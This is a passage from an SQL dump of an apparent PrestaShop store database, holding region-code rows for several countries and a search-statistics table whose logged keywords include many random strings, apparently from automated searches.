(41, 21, 2, 'Pennsylvania', 'PA', 0, 1),
(42, 21, 2, 'Rhode Island', 'RI', 0, 1),
(43, 21, 2, 'South Carolina', 'SC', 0, 1),
(44, 21, 2, 'South Dakota', 'SD', 0, 1),
(45, 21, 2, 'Tennessee', 'TN', 0, 1),
(46, 21, 2, 'Texas', 'TX', 0, 1),
(47, 21, 2, 'Utah', 'UT', 0, 1),
(48, 21, 2, 'Vermont', 'VT', 0, 1),
(49, 21, 2, 'Virginia', 'VA', 0, 1),
(50, 21, 2, 'Washington', 'WA', 0, 1),
(51, 21, 2, 'West Virginia', 'WV', 0, 1),
(52, 21, 2, 'Wisconsin', 'WI', 0, 1),
(53, 21, 2, 'Wyoming', 'WY', 0, 1),
(54, 21, 2, 'Puerto Rico', 'PR', 0, 1),
(55, 21, 2, 'US Virgin Islands', 'VI', 0, 1),
(56, 21, 2, 'District of Columbia', 'DC', 0, 1),
(57, 145, 2, 'Aguascalientes', 'AGS', 0, 1),
(58, 145, 2, 'Baja California', 'BCN', 0, 1),
(59, 145, 2, 'Baja California Sur', 'BCS', 0, 1),
(60, 145, 2, 'Campeche', 'CAM', 0, 1),
(61, 145, 2, 'Chiapas', 'CHP', 0, 1),
(62, 145, 2, 'Chihuahua', 'CHH', 0, 1),
(63, 145, 2, 'Coahuila', 'COA', 0, 1),
(64, 145, 2, 'Colima', 'COL', 0, 1),
(65, 145, 2, 'Distrito Federal', 'DIF', 0, 1),
(66, 145, 2, 'Durango', 'DUR', 0, 1),
(67, 145, 2, 'Guanajuato', 'GUA', 0, 1),
(68, 145, 2, 'Guerrero', 'GRO', 0, 1),
(69, 145, 2, 'Hidalgo', 'HID', 0, 1),
(70, 145, 2, 'Jalisco', 'JAL', 0, 1),
(71, 145, 2, 'Estado de México', 'MEX', 0, 1),
(72, 145, 2, 'Michoacán', 'MIC', 0, 1),
(73, 145, 2, 'Morelos', 'MOR', 0, 1),
(74, 145, 2, 'Nayarit', 'NAY', 0, 1),
(75, 145, 2, 'Nuevo León', 'NLE', 0, 1),
(76, 145, 2, 'Oaxaca', 'OAX', 0, 1),
(77, 145, 2, 'Puebla', 'PUE', 0, 1),
(78, 145, 2, 'Querétaro', 'QUE', 0, 1),
(79, 145, 2, 'Quintana Roo', 'ROO', 0, 1),
(80, 145, 2, 'San Luis Potosí', 'SLP', 0, 1),
(81, 145, 2, 'Sinaloa', 'SIN', 0, 1),
(82, 145, 2, 'Sonora', 'SON', 0, 1),
(83, 145, 2, 'Tabasco', 'TAB', 0, 1),
(84, 145, 2, 'Tamaulipas', 'TAM', 0, 1),
(85, 145, 2, 'Tlaxcala', 'TLA', 0, 1),
(86, 145, 2, 'Veracruz', 'VER', 0, 1),
(87, 145, 2, 'Yucatán', 'YUC', 0, 1),
(88, 145, 2, 'Zacatecas', 'ZAC', 0, 1),
(89, 4, 2, 'Ontario', 'ON', 0, 1),
(90, 4, 2, 'Quebec', 'QC', 0, 1),
(91, 4, 2, 'British Columbia', 'BC', 0, 1),
(92, 4, 2, 'Alberta', 'AB', 0, 1),
(93, 4, 2, 'Manitoba', 'MB', 0, 1),
(94, 4, 2, 'Saskatchewan', 'SK', 0, 1),
(95, 4, 2, 'Nova Scotia', 'NS', 0, 1),
(96, 4, 2, 'New Brunswick', 'NB', 0, 1),
(97, 4, 2, 'Newfoundland and Labrador', 'NL', 0, 1),
(98, 4, 2, 'Prince Edward Island', 'PE', 0, 1),
(99, 4, 2, 'Northwest Territories', 'NT', 0, 1),
(100, 4, 2, 'Yukon', 'YT', 0, 1),
(101, 4, 2, 'Nunavut', 'NU', 0, 1),
(102, 44, 6, 'Buenos Aires', 'B', 0, 1),
(103, 44, 6, 'Catamarca', 'K', 0, 1),
(104, 44, 6, 'Chaco', 'H', 0, 1),
(105, 44, 6, 'Chubut', 'U', 0, 1),
(106, 44, 6, 'Ciudad de Buenos Aires', 'C', 0, 1),
(107, 44, 6, 'Córdoba', 'X', 0, 1),
(108, 44, 6, 'Corrientes', 'W', 0, 1),
(109, 44, 6, 'Entre Ríos', 'E', 0, 1),
(110, 44, 6, 'Formosa', 'P', 0, 1),
(111, 44, 6, 'Jujuy', 'Y', 0, 1),
(112, 44, 6, 'La Pampa', 'L', 0, 1),
(113, 44, 6, 'La Rioja', 'F', 0, 1),
(114, 44, 6, 'Mendoza', 'M', 0, 1),
(115, 44, 6, 'Misiones', 'N', 0, 1),
(116, 44, 6, 'Neuquén', 'Q', 0, 1),
(117, 44, 6, 'Río Negro', 'R', 0, 1),
(118, 44, 6, 'Salta', 'A', 0, 1),
(119, 44, 6, 'San Juan', 'J', 0, 1),
(120, 44, 6, 'San Luis', 'D', 0, 1),
(121, 44, 6, 'Santa Cruz', 'Z', 0, 1),
(122, 44, 6, 'Santa Fe', 'S', 0, 1),
(123, 44, 6, 'Santiago del Estero', 'G', 0, 1),
(124, 44, 6, 'Tierra del Fuego', 'V', 0, 1),
(125, 44, 6, 'Tucumán', 'T', 0, 1),
(126, 10, 9, 'Agrigento', 'AG', 0, 1),
(127, 10, 9, 'Alessandria', 'AL', 0, 1),
(128, 10, 9, 'Ancona', 'AN', 0, 1),
(129, 10, 9, 'Aosta', 'AO', 0, 1),
(130, 10, 9, 'Arezzo', 'AR', 0, 1),
(131, 10, 9, 'Ascoli Piceno', 'AP', 0, 1),
(132, 10, 9, 'Asti', 'AT', 0, 1),
(133, 10, 9, 'Avellino', 'AV', 0, 1),
(134, 10, 9, 'Bari', 'BA', 0, 1),
(135, 10, 9, 'Barletta-Andria-Trani', 'BT', 0, 1),
(136, 10, 9, 'Belluno', 'BL', 0, 1),
(137, 10, 9, 'Benevento', 'BN', 0, 1),
(138, 10, 9, 'Bergamo', 'BG', 0, 1),
(139, 10, 9, 'Biella', 'BI', 0, 1),
(140, 10, 9, 'Bologna', 'BO', 0, 1),
(141, 10, 9, 'Bolzano', 'BZ', 0, 1),
(142, 10, 9, 'Brescia', 'BS', 0, 1),
(143, 10, 9, 'Brindisi', 'BR', 0, 1),
(144, 10, 9, 'Cagliari', 'CA', 0, 1),
(145, 10, 9, 'Caltanissetta', 'CL', 0, 1),
(146, 10, 9, 'Campobasso', 'CB', 0, 1),
(147, 10, 9, 'Carbonia-Iglesias', 'CI', 0, 1),
(148, 10, 9, 'Caserta', 'CE', 0, 1),
(149, 10, 9, 'Catania', 'CT', 0, 1),
(150, 10, 9, 'Catanzaro', 'CZ', 0, 1),
(151, 10, 9, 'Chieti', 'CH', 0, 1),
(152, 10, 9, 'Como', 'CO', 0, 1),
(153, 10, 9, 'Cosenza', 'CS', 0, 1),
(154, 10, 9, 'Cremona', 'CR', 0, 1),
(155, 10, 9, 'Crotone', 'KR', 0, 1),
(156, 10, 9, 'Cuneo', 'CN', 0, 1),
(157, 10, 9, 'Enna', 'EN', 0, 1),
(158, 10, 9, 'Fermo', 'FM', 0, 1),
(159, 10, 9, 'Ferrara', 'FE', 0, 1),
(160, 10, 9, 'Firenze', 'FI', 0, 1),
(161, 10, 9, 'Foggia', 'FG', 0, 1),
(162, 10, 9, 'Forlì-Cesena', 'FC', 0, 1),
(163, 10, 9, 'Frosinone', 'FR', 0, 1),
(164, 10, 9, 'Genova', 'GE', 0, 1),
(165, 10, 9, 'Gorizia', 'GO', 0, 1),
(166, 10, 9, 'Grosseto', 'GR', 0, 1),
(167, 10, 9, 'Imperia', 'IM', 0, 1),
(168, 10, 9, 'Isernia', 'IS', 0, 1),
(169, 10, 9, 'L\'Aquila', 'AQ', 0, 1),
(170, 10, 9, 'La Spezia', 'SP', 0, 1),
(171, 10, 9, 'Latina', 'LT', 0, 1),
(172, 10, 9, 'Lecce', 'LE', 0, 1),
(173, 10, 9, 'Lecco', 'LC', 0, 1),
(174, 10, 9, 'Livorno', 'LI', 0, 1),
(175, 10, 9, 'Lodi', 'LO', 0, 1),
(176, 10, 9, 'Lucca', 'LU', 0, 1),
(177, 10, 9, 'Macerata', 'MC', 0, 1),
(178, 10, 9, 'Mantova', 'MN', 0, 1),
(179, 10, 9, 'Massa', 'MS', 0, 1),
(180, 10, 9, 'Matera', 'MT', 0, 1),
(181, 10, 9, 'Medio Campidano', 'VS', 0, 1),
(182, 10, 9, 'Messina', 'ME', 0, 1),
(183, 10, 9, 'Milano', 'MI', 0, 1),
(184, 10, 9, 'Modena', 'MO', 0, 1),
(185, 10, 9, 'Monza e della Brianza', 'MB', 0, 1),
(186, 10, 9, 'Napoli', 'NA', 0, 1),
(187, 10, 9, 'Novara', 'NO', 0, 1),
(188, 10, 9, 'Nuoro', 'NU', 0, 1),
(189, 10, 9, 'Ogliastra', 'OG', 0, 1),
(190, 10, 9, 'Olbia-Tempio', 'OT', 0, 1),
(191, 10, 9, 'Oristano', 'OR', 0, 1),
(192, 10, 9, 'Padova', 'PD', 0, 1),
(193, 10, 9, 'Palermo', 'PA', 0, 1),
(194, 10, 9, 'Parma', 'PR', 0, 1),
(195, 10, 9, 'Pavia', 'PV', 0, 1),
(196, 10, 9, 'Perugia', 'PG', 0, 1),
(197, 10, 9, 'Pesaro-Urbino', 'PU', 0, 1),
(198, 10, 9, 'Pescara', 'PE', 0, 1),
(199, 10, 9, 'Piacenza', 'PC', 0, 1),
(200, 10, 9, 'Pisa', 'PI', 0, 1),
(201, 10, 9, 'Pistoia', 'PT', 0, 1),
(202, 10, 9, 'Pordenone', 'PN', 0, 1),
(203, 10, 9, 'Potenza', 'PZ', 0, 1),
(204, 10, 9, 'Prato', 'PO', 0, 1),
(205, 10, 9, 'Ragusa', 'RG', 0, 1),
(206, 10, 9, 'Ravenna', 'RA', 0, 1),
(207, 10, 9, 'Reggio Calabria', 'RC', 0, 1),
(208, 10, 9, 'Reggio Emilia', 'RE', 0, 1),
(209, 10, 9, 'Rieti', 'RI', 0, 1),
(210, 10, 9, 'Rimini', 'RN', 0, 1),
(211, 10, 9, 'Roma', 'RM', 0, 1),
(212, 10, 9, 'Rovigo', 'RO', 0, 1),
(213, 10, 9, 'Salerno', 'SA', 0, 1),
(214, 10, 9, 'Sassari', 'SS', 0, 1),
(215, 10, 9, 'Savona', 'SV', 0, 1),
(216, 10, 9, 'Siena', 'SI', 0, 1),
(217, 10, 9, 'Siracusa', 'SR', 0, 1),
(218, 10, 9, 'Sondrio', 'SO', 0, 1),
(219, 10, 9, 'Taranto', 'TA', 0, 1),
(220, 10, 9, 'Teramo', 'TE', 0, 1),
(221, 10, 9, 'Terni', 'TR', 0, 1),
(222, 10, 9, 'Torino', 'TO', 0, 1),
(223, 10, 9, 'Trapani', 'TP', 0, 1),
(224, 10, 9, 'Trento', 'TN', 0, 1),
(225, 10, 9, 'Treviso', 'TV', 0, 1),
(226, 10, 9, 'Trieste', 'TS', 0, 1),
(227, 10, 9, 'Udine', 'UD', 0, 1),
(228, 10, 9, 'Varese', 'VA', 0, 1),
(229, 10, 9, 'Venezia', 'VE', 0, 1),
(230, 10, 9, 'Verbano-Cusio-Ossola', 'VB', 0, 1),
(231, 10, 9, 'Vercelli', 'VC', 0, 1),
(232, 10, 9, 'Verona', 'VR', 0, 1),
(233, 10, 9, 'Vibo Valentia', 'VV', 0, 1),
(234, 10, 9, 'Vicenza', 'VI', 0, 1),
(235, 10, 9, 'Viterbo', 'VT', 0, 1),
(236, 111, 3, 'Aceh', 'ID-AC', 0, 1),
(237, 111, 3, 'Bali', 'ID-BA', 0, 1),
(238, 111, 3, 'Banten', 'ID-BT', 0, 1),
(239, 111, 3, 'Bengkulu', 'ID-BE', 0, 1),
(240, 111, 3, 'Gorontalo', 'ID-GO', 0, 1),
(241, 111, 3, 'Jakarta', 'ID-JK', 0, 1),
(242, 111, 3, 'Jambi', 'ID-JA', 0, 1),
(243, 111, 3, 'Jawa Barat', 'ID-JB', 0, 1),
(244, 111, 3, 'Jawa Tengah', 'ID-JT', 0, 1),
(245, 111, 3, 'Jawa Timur', 'ID-JI', 0, 1),
(246, 111, 3, 'Kalimantan Barat', 'ID-KB', 0, 1),
(247, 111, 3, 'Kalimantan Selatan', 'ID-KS', 0, 1),
(248, 111, 3, 'Kalimantan Tengah', 'ID-KT', 0, 1),
(249, 111, 3, 'Kalimantan Timur', 'ID-KI', 0, 1),
(250, 111, 3, 'Kalimantan Utara', 'ID-KU', 0, 1),
(251, 111, 3, 'Kepulauan Bangka Belitug', 'ID-BB', 0, 1),
(252, 111, 3, 'Kepulauan Riau', 'ID-KR', 0, 1),
(253, 111, 3, 'Lampung', 'ID-LA', 0, 1),
(254, 111, 3, 'Maluku', 'ID-MA', 0, 1),
(255, 111, 3, 'Maluku Utara', 'ID-MU', 0, 1),
(256, 111, 3, 'Nusa Tengara Barat', 'ID-NB', 0, 1),
(257, 111, 3, 'Nusa Tenggara Timur', 'ID-NT', 0, 1),
(258, 111, 3, 'Papua', 'ID-PA', 0, 1),
(259, 111, 3, 'Papua Barat', 'ID-PB', 0, 1),
(260, 111, 3, 'Riau', 'ID-RI', 0, 1),
(261, 111, 3, 'Sulawesi Barat', 'ID-SR', 0, 1),
(262, 111, 3, 'Sulawesi Selatan', 'ID-SN', 0, 1),
(263, 111, 3, 'Sulawesi Tengah', 'ID-ST', 0, 1),
(264, 111, 3, 'Sulawesi Tenggara', 'ID-SG', 0, 1),
(265, 111, 3, 'Sulawesi Utara', 'ID-SA', 0, 1),
(266, 111, 3, 'Sumatera Barat', 'ID-SB', 0, 1),
(267, 111, 3, 'Sumatera Selatan', 'ID-SS', 0, 1),
(268, 111, 3, 'Sumatera Utara', 'ID-SU', 0, 1),
(269, 111, 3, 'Yogyakarta', 'ID-YO', 0, 1),
(270, 11, 3, 'Aichi', '23', 0, 1),
(271, 11, 3, 'Akita', '05', 0, 1),
(272, 11, 3, 'Aomori', '02', 0, 1),
(273, 11, 3, 'Chiba', '12', 0, 1),
(274, 11, 3, 'Ehime', '38', 0, 1),
(275, 11, 3, 'Fukui', '18', 0, 1),
(276, 11, 3, 'Fukuoka', '40', 0, 1),
(277, 11, 3, 'Fukushima', '07', 0, 1),
(278, 11, 3, 'Gifu', '21', 0, 1),
(279, 11, 3, 'Gunma', '10', 0, 1),
(280, 11, 3, 'Hiroshima', '34', 0, 1),
(281, 11, 3, 'Hokkaido', '01', 0, 1),
(282, 11, 3, 'Hyogo', '28', 0, 1),
(283, 11, 3, 'Ibaraki', '08', 0, 1),
(284, 11, 3, 'Ishikawa', '17', 0, 1),
(285, 11, 3, 'Iwate', '03', 0, 1),
(286, 11, 3, 'Kagawa', '37', 0, 1),
(287, 11, 3, 'Kagoshima', '46', 0, 1),
(288, 11, 3, 'Kanagawa', '14', 0, 1),
(289, 11, 3, 'Kochi', '39', 0, 1),
(290, 11, 3, 'Kumamoto', '43', 0, 1),
(291, 11, 3, 'Kyoto', '26', 0, 1),
(292, 11, 3, 'Mie', '24', 0, 1),
(293, 11, 3, 'Miyagi', '04', 0, 1),
(294, 11, 3, 'Miyazaki', '45', 0, 1),
(295, 11, 3, 'Nagano', '20', 0, 1),
(296, 11, 3, 'Nagasaki', '42', 0, 1),
(297, 11, 3, 'Nara', '29', 0, 1),
(298, 11, 3, 'Niigata', '15', 0, 1),
(299, 11, 3, 'Oita', '44', 0, 1),
(300, 11, 3, 'Okayama', '33', 0, 1),
(301, 11, 3, 'Okinawa', '47', 0, 1),
(302, 11, 3, 'Osaka', '27', 0, 1),
(303, 11, 3, 'Saga', '41', 0, 1),
(304, 11, 3, 'Saitama', '11', 0, 1),
(305, 11, 3, 'Shiga', '25', 0, 1),
(306, 11, 3, 'Shimane', '32', 0, 1),
(307, 11, 3, 'Shizuoka', '22', 0, 1),
(308, 11, 3, 'Tochigi', '09', 0, 1),
(309, 11, 3, 'Tokushima', '36', 0, 1),
(310, 11, 3, 'Tokyo', '13', 0, 1),
(311, 11, 3, 'Tottori', '31', 0, 1),
(312, 11, 3, 'Toyama', '16', 0, 1),
(313, 11, 3, 'Wakayama', '30', 0, 1),
(314, 11, 3, 'Yamagata', '06', 0, 1),
(315, 11, 3, 'Yamaguchi', '35', 0, 1),
(316, 11, 3, 'Yamanashi', '19', 0, 1),
(317, 24, 5, 'Australian Capital Territory', 'ACT', 0, 1),
(318, 24, 5, 'New South Wales', 'NSW', 0, 1),
(319, 24, 5, 'Northern Territory', 'NT', 0, 1),
(320, 24, 5, 'Queensland', 'QLD', 0, 1),
(321, 24, 5, 'South Australia', 'SA', 0, 1),
(322, 24, 5, 'Tasmania', 'TAS', 0, 1),
(323, 24, 5, 'Victoria', 'VIC', 0, 1),
(324, 24, 5, 'Western Australia', 'WA', 0, 1),
(325, 15, 10, 'Continente', 'PT', 0, 1),
(326, 245, 11, 'Madeira', 'MA', 0, 1),
(327, 245, 11, 'Açores', 'AC', 0, 1),
(328, 58, 6, 'Acre', 'AC', 0, 1),
(329, 58, 6, 'Alagoas', 'AL', 0, 1),
(330, 58, 6, 'Amapá', 'AP', 0, 1),
(331, 58, 6, 'Amazonas', 'AM', 0, 1),
(332, 58, 6, 'Bahia', 'BA', 0, 1),
(333, 58, 6, 'Ceará', 'CE', 0, 1),
(334, 58, 6, 'Distrito Federal', 'DF', 0, 1),
(335, 58, 6, 'Espírito Santo', 'ES', 0, 1),
(336, 58, 6, 'Goiás', 'GO', 0, 1),
(337, 58, 6, 'Maranhão', 'MA', 0, 1),
(338, 58, 6, 'Mato Grosso', 'MT', 0, 1),
(339, 58, 6, 'Mato Grosso do Sul', 'MS', 0, 1),
(340, 58, 6, 'Minas Gerais', 'MG', 0, 1),
(341, 58, 6, 'Pará', 'PA', 0, 1),
(342, 58, 6, 'Paraíba', 'PB', 0, 1),
(343, 58, 6, 'Paraná', 'PR', 0, 1),
(344, 58, 6, 'Pernambuco', 'PE', 0, 1),
(345, 58, 6, 'Piauí', 'PI', 0, 1),
(346, 58, 6, 'Rio de Janeiro', 'RJ', 0, 1),
(347, 58, 6, 'Rio Grande do Norte', 'RN', 0, 1),
(348, 58, 6, 'Rio Grande do Sul', 'RS', 0, 1),
(349, 58, 6, 'Rondônia', 'RO', 0, 1),
(350, 58, 6, 'Roraima', 'RR', 0, 1),
(351, 58, 6, 'Santa Catarina', 'SC', 0, 1),
(352, 58, 6, 'São Paulo', 'SP', 0, 1),
(353, 58, 6, 'Sergipe', 'SE', 0, 1),
(354, 58, 6, 'Tocantins', 'TO', 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `ps_statssearch`
--

CREATE TABLE `ps_statssearch` (
  `id_statssearch` int(10) UNSIGNED NOT NULL,
  `id_shop` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `id_shop_group` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `keywords` varchar(255) NOT NULL,
  `results` int(6) NOT NULL DEFAULT '0',
  `date_add` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_statssearch`
--

INSERT INTO `ps_statssearch` (`id_statssearch`, `id_shop`, `id_shop_group`, `keywords`, `results`, `date_add`) VALUES
(1, 1, 1, 'pe', 0, '2020-11-16 18:22:29'),
(2, 1, 1, 'peculiar', 2, '2020-11-16 18:22:30'),
(3, 1, 1, 'peculiar', 2, '2020-11-16 18:22:30'),
(4, 1, 1, 'peculiar', 2, '2020-11-16 18:22:41'),
(5, 1, 1, 'peculiar', 2, '2020-11-16 18:35:56'),
(6, 1, 1, '20', 0, '2020-11-17 13:06:02'),
(7, 1, 1, '201', 11, '2020-11-17 13:06:02'),
(8, 1, 1, '2018', 5, '2020-11-17 13:06:03'),
(9, 1, 1, '2018', 5, '2020-11-17 13:06:04'),
(10, 1, 1, 'p', 0, '2020-11-17 13:11:43'),
(11, 1, 1, 'pec', 3, '2020-11-17 13:11:44'),
(12, 1, 1, 'peculi', 3, '2020-11-17 13:11:44'),
(13, 1, 1, 'peculiar', 3, '2020-11-17 13:11:45'),
(14, 1, 1, 'peculiar', 3, '2020-11-17 13:11:46'),
(15, 1, 1, 'YCNAvjVT', 0, '2021-03-15 17:30:01'),
(16, 1, 1, 'NWzFyBVQaMZ', 0, '2021-03-15 17:30:03'),
(17, 1, 1, 'PiRfnYwZT', 0, '2021-03-15 17:30:23'),
(18, 1, 1, 'eMatuBClrv', 0, '2021-03-15 17:30:24'),
(19, 1, 1, 'iKazNugU', 0, '2021-03-15 17:31:09'),
(20, 1, 1, 'SgkMEdqQRVNb', 0, '2021-03-15 17:31:11'),
(21, 1, 1, 'ifjIqghtZPcHAYL', 0, '2021-03-15 17:31:15'),
(22, 1, 1, 'GrhqFQatvgy', 0, '2021-03-15 17:31:40'),
(23, 1, 1, 'siRjzXkZNYGDIhHu', 0, '2021-03-15 17:31:41'),
(24, 1, 1, 'VAeXdzMUZEroga', 0, '2021-03-15 17:32:12'),
(25, 1, 1, 'EeYCuoiGIPgrHfX', 0, '2021-03-15 17:32:18'),
(26, 1, 1, 'GWZSILiw', 0, '2021-03-15 17:32:27'),
(27, 1, 1, 'AcFOlVpyeB', 0, '2021-03-15 17:32:28'),
(28, 1, 1, 'CZdbHWiUnQPDwqx', 0, '2021-06-14 08:30:12'),
(29, 1, 1, 'UJnROePdA', 0, '2021-06-14 08:30:13'),
(30, 1, 1, 'GOhmyxbHYFncIe', 0, '2021-06-14 08:30:20'),
(31, 1, 1, 'KWVLGmXkroUQFpH', 0, '2021-06-14 08:30:21'),
(32, 1, 1, 'SkJCMqdgATlWVfp', 0, '2021-06-14 08:30:39'),
(33, 1, 1, 'jPiHtumSl', 0, '2021-06-14 08:30:40'),
(34, 1, 1, 'vidwVQBYxnHqa', 0, '2021-06-14 08:30:41'),
(35, 1, 1, 'VSWUlptTc', 0, '2021-06-14 08:30:42'),
(36, 1, 1, 'XQLtoEGcKuU', 0, '2021-06-14 08:30:49'),
(37, 1, 1, 'GlIMpDBjRTmuoF', 0, '2021-06-14 08:30:50'),
(38, 1, 1, 'qKDYtabWUHQR', 0, '2021-06-14 08:30:59'),
(39, 1, 1, 'bqfkgyGjizsRZ', 0, '2021-06-14 08:31:00'),
(40, 1, 1, 'zQeqviXKG', 0, '2021-06-14 08:31:04'),
(41, 1, 1, 'LEfynBkxbzVR', 0, '2021-06-14 08:31:05'),
(42, 1, 1, 'eCVrNUkGXmLp', 0, '2021-07-18 00:37:41'),
(43, 1, 1, 'deLnVBGoSYWi', 0, '2021-07-18 00:37:45'),
(44, 1, 1, 'JRlHWFcASD', 0, '2021-07-25 15:32:05'),
(45, 1, 1, 'iILgJrxFHmznk', 0, '2021-07-25 15:32:07'),
(46, 1, 1, 'LfIzwJdlgS', 0, '2021-07-25 15:32:11'),
(47, 1, 1, 'DmRGMdjbf', 0, '2021-07-25 15:32:12'),
(48, 1, 1, 'ytbFaBkMHJ', 0, '2021-07-25 15:32:20'),
(49, 1, 1, 'ImGABwyqrpkicO', 0, '2021-07-25 15:32:21'),
(50, 1, 1, 'uNUzYvidEZCtf', 0, '2021-07-25 15:32:21'),
(51, 1, 1, 'AaDbftopIdYhUyLm', 0, '2021-07-25 15:32:21'),
(52, 1, 1, 'aQHiLXpK', 0, '2021-07-25 15:32:39'),
(53, 1, 1, 'QyeMZctRBqVmEKp', 0, '2021-07-25 15:32:40'),
(54, 1, 1, 'HWKewJRLvOXGUd', 0, '2021-07-25 15:32:41'),
(55, 1, 1, 'lLWqmScgMe', 0, '2021-07-25 15:32:42'),
(56, 1, 1, 'tbdUlNuyCOGi', 0, '2021-07-25 15:32:44'),
(57, 1, 1, 'LMfVRNAXkG', 0, '2021-07-25 15:32:45'),
(58, 1, 1, 'edMUrvJHxbFngk', 0, '2021-08-01 18:49:57'),
(59, 1, 1, 'AYMGVQpSU', 0, '2021-08-01 18:49:58'),
(60, 1, 1, 'FSYlTvoWmQaLn', 0, '2021-08-01 18:50:21'),
(61, 1, 1, 'YtJqDwFETpQk', 0, '2021-08-01 18:50:22'),
(62, 1, 1, 'rDtHVoqU', 0, '2021-08-01 18:50:31'),
(63, 1, 1, 'UzigLSwfQy', 0, '2021-08-01 18:50:32'),
(64, 1, 1, 'pqhFKkyrVo', 0, '2021-08-01 18:50:33'),
(65, 1, 1, 'oigpvAjNVPyQ', 0, '2021-08-01 18:50:33'),
(66, 1, 1, 'xaMIzCDWwZuVy', 0, '2021-08-07 19:14:23'),
(67, 1, 1, 'dOPUaQFzsHnYCE', 0, '2021-08-07 19:14:24'),
(68, 1, 1, 'lwtHYWGrdh', 0, '2021-08-07 19:14:43'),
(69, 1, 1, 'FLIMWQJjK', 0, '2021-08-07 19:14:45'),
(70, 1, 1, 'cuyXEVpYZt', 0, '2021-08-07 19:14:47'),
(71, 1, 1, 'ihbagjOdZ', 0, '2021-08-07 19:14:49'),
(72, 1, 1, 'puoCbVYsTvPNk', 0, '2021-08-07 19:14:50'),
(73, 1, 1, 'KoPBwMgC', 0, '2021-08-07 19:14:51'),
(74, 1, 1, 'QlLnPYoGUu', 0, '2021-08-07 19:14:56'),
(75, 1, 1, 'zICwjvAyOxYHBd', 0, '2021-08-07 19:14:57'),
(76, 1, 1, 'fXvNSMmVn', 0, '2021-08-07 19:14:59'),
(77, 1, 1, 'aUNXzprxZiC', 0, '2021-08-07 19:15:00'),
(78, 1, 1, 'YFETMuwApNn', 0, '2021-08-07 19:15:04'),
(79, 1, 1, 'GDeqbyUfWwLTt', 0, '2021-08-07 19:15:05'),
(80, 1, 1, 'ebzPcOiTlHuvhQ', 0, '2021-08-16 00:16:41'),
(81, 1, 1, 'EfmloBxr', 0, '2021-08-16 00:16:42'),
(82, 1, 1, 'oGsdNVOYtmwZMSgH', 0, '2021-08-16 00:19:25'),
(83, 1, 1, 'pNRCmaPdGY', 0, '2021-08-16 00:19:26'),
(84, 1, 1, 'hluzUvFDCEiB', 0, '2021-08-16 00:19:43'),
(85, 1, 1, 'zxUaKjNpd', 0, '2021-08-16 00:19:44'),
(86, 1, 1, 'sPWuioVfDYJK', 0, '2021-08-16 00:19:45'),
(87, 1, 1, 'wrbKthLTNdUcxIp', 0, '2021-08-16 00:19:46'),
(88, 1, 1, 'nOYlRZUpshJKf', 0, '2021-08-16 00:20:27'),
(89, 1, 1, 'xzpcEQBZC', 0, '2021-08-16 00:20:28'),
(90, 1, 1, 'AJVSkIqZvKhOU', 0, '2021-08-16 00:21:20'),
(91, 1, 1, 'NTfXSnvuDbEwRGCL', 0, '2021-08-16 00:21:21'),
(92, 1, 1, 'XiceOzFqp', 0, '2021-08-16 00:21:38'),
(93, 1, 1, 'olWYTIMQD', 0, '2021-08-16 00:21:39'),
(94, 1, 1, 'dsoEZkaMuVz', 0, '2021-08-24 07:48:36'),
(95, 1, 1, 'bPTdZxBROzoV', 0, '2021-08-24 07:48:38'),
(96, 1, 1, 'JbzeQXMyqEtYkwNB', 0, '2021-08-24 07:48:47'),
(97, 1, 1, 'efkiaCHsLGXgz', 0, '2021-08-24 07:48:49'),
(98, 1, 1, 'bYFLxGrSKi', 0, '2021-08-24 07:49:09'),
(99, 1, 1, 'tXEgvbJmZVChHr', 0, '2021-08-24 07:49:10'),
(100, 1, 1, 'miQuWZGPMHY', 0, '2021-08-24 07:49:11'),
(101, 1, 1, 'WaFNTrElqhdS', 0, '2021-08-24 07:49:13'),
(102, 1, 1, 'VuACbEykj', 0, '2021-08-24 07:49:31'),
(103, 1, 1, 'TZYlwLgOhPGiIsf', 0, '2021-08-24 07:49:32'),
(104, 1, 1, 'rGHPaQzOEpKoj', 0, '2021-08-24 07:49:36'),
(105, 1, 1, 'BpIRCTDqdxJrhmFt', 0, '2021-08-24 07:49:37'),
(106, 1, 1, 'XrLFpVqk', 0, '2021-08-24 07:49:53'),
(107, 1, 1, 'ABSZezYmQI', 0, '2021-08-24 07:49:54'),
(108, 1, 1, 'usawhdKM', 0, '2021-08-30 17:43:09'),
(109, 1, 1, 'wMPHRWBx', 0, '2021-08-30 17:43:11'),
(110, 1, 1, 'gELdUiqYSGVh', 0, '2021-08-30 17:44:01'),
(111, 1, 1, 'YUQtADzRKE', 0, '2021-08-30 17:44:02'),
(112, 1, 1, 'TwVMQHgYFBCJs', 0, '2021-08-30 17:44:12'),
(113, 1, 1, 'OutyJiKYm', 0, '2021-08-30 17:44:14'),
(114, 1, 1, 'pSUoqBTXihYDCry', 0, '2021-08-30 17:44:15'),
(115, 1, 1, 'IfxUvdkVgXKTjlat', 0, '2021-08-30 17:44:15'),
(116, 1, 1, 'AbGCjlfLrOen', 0, '2021-08-30 17:44:49'),
(117, 1, 1, 'QiUBlscE', 0, '2021-08-30 17:44:50'),
(118, 1, 1, 'YWXmDNofsxKC', 0, '2021-08-30 17:45:03'),
(119, 1, 1, 'ATQUSyNEZvc', 0, '2021-08-30 17:45:06'),
(120, 1, 1, 'YILPNdQBFCWMyDri', 0, '2021-08-30 17:45:16'),
(121, 1, 1, 'EKrOzXiePIN', 0, '2021-08-30 17:45:17'),
(122, 1, 1, 'IRTcKEWSHxBmqtA', 0, '2021-09-06 16:08:42'),
(123, 1, 1, 'TqcaXYAnoUyisgI', 0, '2021-09-06 16:08:43'),
(124, 1, 1, 'FdNZfjuhCDtQkK', 0, '2021-09-06 16:09:17'),
(125, 1, 1, 'dyboMORgUJwvns', 0, '2021-09-06 16:09:18'),
(126, 1, 1, 'dgIUpMRoN', 0, '2021-09-12 19:50:25'),
(127, 1, 1, 'sJcGwBnWhqiY', 0, '2021-09-12 19:50:26'),
(128, 1, 1, 'kNqTFMOEKVSa', 0, '2021-09-12 19:50:30'),
(129, 1, 1, 'vgmPzHQBCRZG', 0, '2021-09-12 19:50:31'),
(130, 1, 1, 'wFhnUxIpYmzos', 0, '2021-09-12 19:50:34'),
(131, 1, 1, 'puNwWyUM', 0, '2021-09-12 19:50:35'),
(132, 1, 1, 'iTwHvVpzIP', 0, '2021-09-12 19:50:37'),
